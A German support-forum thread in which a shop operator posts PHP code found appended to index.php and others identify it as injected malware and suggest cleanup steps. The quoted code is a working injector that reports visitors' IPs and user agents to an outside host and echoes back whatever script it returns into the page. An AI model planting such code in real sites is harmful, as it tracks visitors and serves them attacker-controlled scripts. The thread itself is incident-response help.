"Merkwürdiger" Code in der index.php

[TheOggy]

Hi,

am Ende der index.php haben wir folgenden Code gefunden und können diesen nicht ganz zuordnen. In der Originalen index.php ist dieser nicht enthalten.
Weiß leider auch nicht ob er vielleicht zu irgendeinem Plugin oder ähnlichem gehört...vielleicht kann jemand von euch was damit anfangen

$wp_ulr = 'logs'; $wp_tplt = 'http'; error_reporting(0); ini_set('display_errors',0); $wp_vlib = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vlib) && !preg_match ('/bot/i', $wp_vlib))){
$wp_tos="http://".$wp_ulr.$wp_tplt.".com/".$wp_ulr."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vlib);
if (function_exists('curl_init')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_tos); curl_setopt ($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_algo = curl_exec ($ch); curl_close($ch);}  else {$wp_algo = @file_get_contents($wp_tos);}}
if ( substr($wp_algo,1,3) === 'scr' ){ echo $wp_algo; }

Gruß Oggy

 

[MBesancon]

AW: "Merkwürdiger" Code in der index.php

Der Code ist nicht im Standard enthalten! Auf den ersten Blick sieht das für mich nach eingeschleustem Schadcode aus. Du solltest deine Zugangsdaten ändern, prüfen was in der letzten Zeit verändert wurde und anschließend die Shop-Dateien neu einspielen. Wichtig ist auf jeden Fall die Zuagngsdaten zu ändern.

 

[TheOggy]

AW: "Merkwürdiger" Code in der index.php

Hi,

habe ich getan, habe den Code auch entfernt...muss nur mal schauen, ob noch mehr php dateien betroffen sind. Weiß auch noch nicht, wie dies passiert ist/passieren konnte.

danke gruß tobi

 

[TheOggy]

AW: "Merkwürdiger" Code in der index.php

also etwas ist komisch...beim Shopdateiencheck zeigt er mir modifizierte dateien an, wenn ich diese mit originalen ersetze steht trotzdem modifiziert da...auch kann ich keinen unterschied im code in den dateien feststellen.
jemand eine idee?

 

[boaa-group]

AW: "Merkwürdiger" Code in der index.php

Du musst beim Upload darauf achten, dass du die PHP Dateien im Binärmodus hochlädst... dann sollte es passen. Prüfe auch deine .htaccess Datei. In den meisten Fällen werden bei solchen "Angriffen" die index.php und die .htaccess mit Schadcode infiziert.

 

[TheOggy]

AW: "Merkwürdiger" Code in der index.php

danke für den Tipp!

ein paar dateien bleiben im modifiziert status, auch wenn ich sie binär hochlade.
da noch eine idee warum das so ist?

egal ob ich es aus nem frischen shop aus dem download bereich oder aus einem backup...

 

[upbox]

AW: "Merkwürdiger" Code in der index.php

Kuck dir doch bitte mal die Rechte der entsprechenden Dateien an. Kann der FTP User die überhaupt überschreiben?

 

[TheOggy]

AW: "Merkwürdiger" Code in der index.php

hi, haben anscheindend alle 640...

er scheint sie zu ersetzen, datum is von heute...aber sagt modifiziert im backend

 

[casim]

AW: "Merkwürdiger" Code in der index.php

erst dateien mal löschen...dann neu übertragen ... klappt der Löschvorgang?

 

[TheOggy]

AW: "Merkwürdiger" Code in der index.php

kann die dateien umbennen und löschen...bei einer datei hat es so geklappt, bei 4 anderen nicht.